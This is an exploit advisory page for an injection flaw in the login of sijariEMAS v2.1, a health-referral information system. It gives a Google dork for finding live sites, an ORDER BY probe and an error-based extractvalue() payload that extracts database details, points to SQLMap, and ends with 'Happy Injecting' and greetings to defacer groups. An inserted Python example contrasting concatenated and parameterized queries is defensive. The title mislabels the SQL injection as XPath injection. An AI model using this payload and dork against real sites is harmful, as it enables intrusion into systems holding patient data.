sijariEMAS v2.1 Login Xpath Injection Vulnerability - CXSecurity.com

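Vulnerability ID 1464808 Vulnerability type
Published 2019-01-31 Updated 2019-01-31
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019010309
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit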
[+]Exploit Title: sijariEMAS v2.1 Login Xpath Injection Vulnerability 
[+]Author: ./Sn00py 
[+]Team: Indonesian Code Party
[+]Google Dork: "Intext:Sistem Informasi dan Komunikasi Jejaring Rujukan Pelayanan Kesehatan"
[+]Tested on: Linux Parrot 
[+]Vendor: http://sijariemas.net/ 
======================================= 
[+]Proof Of Concept: First, find out whether the site has a login feature. If you enter an ordinary string there is no error, but if you follow it with ' order by 100-- the response shows "Unknown column '100' in 'order clause'". That means the login is vulnerable to SQL injection.

[+]Exploit:
' and extractvalue(0x0a,concat(0x0a,user(),0x0a,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))-- - 
You can use SQLMap, or inject manually using Xpath Injection, to get the web database.
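
Added example, not part of the original advisory and not the vendor's code: the login pattern that produces the ORDER BY error described above, beside a parameterized version that treats the same input as data and does not echo database errors. It uses Python's sqlite3 as a stand-in for the application's MySQL backend (the error wording differs from MySQL's); the table, columns and function names are assumptions.

```python
import sqlite3

# Constructed probe, same shape as the ORDER BY test in the advisory.
PROBE = "' order by 100-- "


def make_db():
    """In-memory stand-in for the login table (schema is an assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-hash')")
    return db


def login_concat(db, username, password_hash):
    """Vulnerable: user input is pasted into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password_hash = '" + password_hash + "'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Returning the database error to the client is what lets
        # error-based techniques such as extractvalue() leak data.
        return "DB error: %s" % exc
    return row[0] if row else None


def login_param(db, username, password_hash):
    """Hardened: placeholders keep input out of the SQL grammar."""
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    try:
        row = db.execute(sql, (username, password_hash)).fetchone()
    except sqlite3.Error:
        # Log the detail server-side; the client sees a generic failure.
        return None
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("concat:", login_concat(db, PROBE, "x"))
    print("param: ", login_param(db, PROBE, "x"))
```
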

[+]Demo? No Demo ^^ Happy Injecting~ 

Greetz: Khatulistiwa - DarkOct02 - Indonesian Code Party - RSFLT - N45HT - PacmanCorp - AllindonesiaDefacer